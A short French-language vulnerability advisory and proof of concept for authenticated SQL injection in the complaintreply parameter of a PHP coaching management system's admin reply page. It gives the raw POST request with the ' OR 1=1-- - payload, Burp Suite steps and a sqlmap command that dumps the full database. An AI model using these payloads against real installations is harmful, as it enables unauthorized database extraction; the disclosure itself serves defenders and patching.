
Preuve de concept pour une injection SQL authentifiée dans Coaching Management System, démontrant le dump de la base de données via le paramètre non assaini `complaintreply`.
Une vulnérabilité d'injection SQL existe dans le système de gestion de coaching en PHP. Le paramètre complaintreply dans la fonctionnalité de réponse de l'administrateur n'est pas correctement assaini avant d'être utilisé dans les requêtes SQL. Un attaquant authentifié (Admin) peut injecter des requêtes SQL malveillantes, conduisant à l'extraction complète de la base de données.
/cims/modules/admin/reply.phpcomplaintreplycode-projects.org
Système de gestion de coaching en PHP https://code-projects.org/coaching-management-system-in-php-with-source-code/
Inconnue (Testé sur la dernière version disponible en avril 2026)
L'étudiant soumet une réclamation 
L'administrateur ouvre la réclamation et accède à la fonctionnalité de réponse
POST /cims/modules/admin/reply.php?complaintid=18 HTTP/1.1 Host: 192.168.0.9 Content-Type: application/x-www-form-urlencoded
complaintreply=' OR 1=1-- -&submit=submit

Intercepter la requête via Burp Suite 
Injecter la charge utile :
'

Erreur SQL observée
7. Confirmer l'injection :
' OR 1=1-- -

Extraire la base de données en utilisant :
sqlmap -r sqli.txt --dump

Sévérité : CRITIQUE